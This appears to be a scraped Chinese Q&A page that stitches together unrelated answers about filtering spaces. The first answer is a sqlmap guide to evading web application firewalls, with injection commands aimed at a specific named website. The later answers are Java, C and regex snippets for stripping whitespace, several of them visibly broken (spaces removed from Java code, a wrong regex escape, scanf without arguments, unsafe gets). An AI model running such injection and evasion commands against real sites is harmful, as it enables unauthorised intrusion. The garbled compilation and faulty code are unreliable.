空格過濾

『壹』 利用sqlmap注入時，發現站點對空格進行了過濾，可以使用什麼腳本來繞過

0x00 前言
現在的網路環境往往是WAF/IPS/IDS保護著Web 伺服器等等，這種保護措施往往會過濾擋住我們的SQL注入查詢鏈接，甚至封鎖我們的主機IP，所以這個時候，我們就要考慮怎樣進行繞過，達到注入的目標。因為現在WAF/IPS/IDS都把sqlmap 列入黑名單了，呵呵！但是本文基於sqlmap 進行繞過注入測試，介紹至今仍然實用有效的技巧，以下策略在特定的環境能夠成功繞過，具體是否繞過，請仔細查看輸出的信息。
0x01 確認WAF
首先我們判斷該Web 伺服器是否被WAF/IPS/IDS保護著。這點很容易實現，因為我們在漏掃或者使用專門工具來檢測是否有WAF，這個檢測，在nmap 的NSE，或者WVS的策略或者APPSCAN的策略中都有，我們可以利用這些來判斷。在此我們，也介紹使用sqlmap 進行檢測是否有WAF/IPS/IDS
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10 --identify-waf#首選
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10 --check-waf#備選
0x02 使用參數進行繞過
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 #使用任意瀏覽器進行繞過，尤其是在WAF配置不當的時候
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hpp -v 3#使用HTTP 參數污染進行繞過，尤其是在ASP.NET/IIS 平台上
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --time-sec=60 #使用長的延時來避免觸發WAF的機制，這方式比較耗時
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --proxy=211.211.211.211:8080 --proxy-cred=211:985#使用代理進行注入

『貳』 java過濾string所有空格

JAVA中去掉抄空格

1. String.trim()

trim()是去掉首尾空格

2.str.replace(" ", ""); 去掉所有空格，包括首尾、中間

代碼如下:

String str = " hell o ";
String str2 = str.replaceAll(" ", "");
System.out.println(str2);

3.或者replaceAll(" +",""); 去掉所有空格

4.str = .replaceAll("\\s*", "");
可以替換大部分空白字元， 不限於空格
\s 可以匹配空格、製表符、換頁符等空白字元的其中任意一個

『叄』 post請求參數含有空格，如何在過濾器中去掉空格符

也不用使用這個類，你不是要獲取沒有空格的參數信息么
直接在servlet獲取參數，然後把參數中的空格（replaceAll(" ","")）去掉不就行了么

『肆』 如何能過濾掉字元串裡面的空格

#include <stdio.h>
#include <string.h>
#include <malloc.h>
void trimall(char* s)
{
int l=strlen(s);
char* tp=(char*)malloc(l+1);
char* ctp=tp;
char* cs=s;
while(*s)
{
if(*s!=' ')
{
*tp=*s;
tp++;
}
s++;
}
*tp='\0';
strcpy(cs,ctp);
free(ctp);
}

int main()
{
char str[100];
printf("輸入一個字元串:");
gets(str);
trimall(str);
printf("清除空格後：\n%s\n",str);
return 0;
}

『伍』 超簡單C語言，看一下錯哪了 過濾掉多餘的空格,只留下一個空格

if(!((zfc[i]=' ')&&(zfc[i+1]=' ')))你這句錯了，邏輯判斷，你寫成賦語句了。數組使用時最好清零一次。

『陸』 急！！scanf怎樣過濾空格和換行。。。

scanf()函數默認空格、制抄表符、換行符為襲數值、字元和字元串的分隔符，也就是說，是自動過濾的，比如
int val;
char ch,s[50];
scanf("%d%c%s");
可以輸入5 A character
該讀入語句可使val = 5，ch = 'A'，s = "character"。

『柒』 java 中 jsp頁面怎麼過濾文本框中的 頭尾空格 有幾種方法！！！

可以用字元串方法,切割,將空格切割掉.
str.split(" ");
或者首位去空格
str.trim();
或者用替換
nstr.replaceAll(" ","" );

『捌』 c++過濾多餘的空格

雖然啰嗦了點，但沒有看出大問題來！把cout<<str;改成cout << str << endl;試試。

『玖』 正則表達式如何表示若干個空格我想用正則表達式過濾掉空字元串，用「」方法沒用，求解。如果一段文本是

s*表示若干個空格（可以是0個）。

s+ 表示一個或多個空格

publicclassTest{
	publicstaticvoidmain(String[]args){
		
		Stringstr="";
		//測試的字元串
		
		Stringregex="\s+";
		//表示一個或多個空格的正則表達式
		
		str=str.trim();
		//去掉字元串開頭和結尾的空格
		
		Stringstr1=str.replaceAll(regex,"");
		//去掉所有的空格
		
		Stringstr2=str.replaceAll(regex,"");
		//把一個或多個空格替換成一個空格
		
		System.out.println(str);
		System.out.println(str1);
		System.out.println(str2);
	}
}

輸出結果如下：

『拾』 正則表達式 過濾空格

查找：
+(?=[^>]*?<)
▲注意來+前有個空格源
替換為：(空)

如果所涉文本跨行，則可考慮用：
+(?=[^>]*?(<|$))
▲注意+前有個空格

也可考慮用以下辦法：
查找：
(>[^<]*?) +
▲注意+前有個空格
替換為：
\1（或$1）
▲此法要反復執行，直至搜索不到。
可用編程實現，結束條件是「搜索不到」。
也可用編輯器的宏功能：
有宏功能的編輯器，都有「重復執行宏」功能；
先錄制一次這個替換，然後指定次數，重復執行。
（EmEditor的「重復執行」可以設置「如果搜索失敗則停止」，十分實用。）